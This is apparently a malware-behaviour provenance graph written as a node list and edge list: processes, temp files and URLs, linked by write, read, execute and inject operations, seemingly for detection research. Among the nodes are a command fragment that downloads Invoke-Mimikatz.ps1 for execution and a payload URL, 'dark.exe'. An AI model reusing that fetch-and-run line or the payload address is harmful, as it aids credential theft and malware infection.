25
MP*-chrome.exe 
MF-\Users\admin\AppData\Local\Temp\Tudehluxjc.exe
MF-C:\Users\admin\AppData\Local\Temp\sltzvhoh
MF-C:\Users\admin\AppData\Local\Temp\88e6dde5e03da6a889feae1525551ab2.exe
MF-\Users\admin\AppData\Local\Temp\3ec1f323b5\danke.exe
MF-\yWorks.dll
MP*-OUTLOOK.EXE 
MF-C:\Users\admin\Desktop\HxDSetup.exe
SO-https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object
MP-Tags.exe 
TP*-ruby.exe
TP-regsvcs.exe
SO-http://fbi.fund/dark.exe
MF-\Windows\system32\svchost.exe
MF-C:\Users\admin\AppData\Local\Temp\Overbygningsuddannelsens
SO-http://go.microsoft.com/fwlink/?LinkId=57426&Ext=elf
MP-ns9B66.tmp 
MP-D911.exe
SF-C:\Users\admin\AppData\Local\Temp\is-P1TLT.tmp
MF-\Users\admin\AppData\Local\Temp\AnyDesk-a444ebcf.exe
MP*-ns9C62.tmp
MF-C:\Users\admin\AppData\Local\Temp\NP232375OF1V04LRD3C096_EAWB.pdf
SF-C:\Users\admin\AppData\Local\Temp\rPO59687543.exe
MP-IBM_LINUX.exe 
MP-wscript.exe
69
0 1 EX
0 2 WR
0 3 WR
0 4 WR
0 5 WR
0 6 FR
6 1 WR
6 2 CD
6 3 WR
6 4 RD
6 5 WR
0 7 RD
6 7 CD
8 0 RF
8 6 RF
0 9 FR
9 1 RD
9 2 WR
9 3 EX
9 4 CD
9 5 WR
6 9 UK
0 10 IJ
10 1 WR
10 2 EX
10 3 RD
10 4 RD
10 5 WR
10 7 RD
8 10 RF
11 1 WR
11 2 WR
11 3 RD
11 4 WR
11 5 WR
11 7 UK
12 10 RF
10 13 RD
10 14 WR
10 15 ST
16 8 ST
10 16 IJ
12 16 RF
16 13 WR
16 14 EX
15 16 RF
8 17 RF
10 17 IJ
12 17 RF
17 13 WR
17 14 WR
15 17 RF
16 17 UK
10 18 RD
10 19 RD
10 20 IJ
20 12 ST
20 13 WR
20 14 EX
20 15 ST
20 18 WR
20 19 WR
20 21 RD
20 22 CD
23 14 UK
24 15 ST
24 18 WR
24 19 RD
20 24 UK

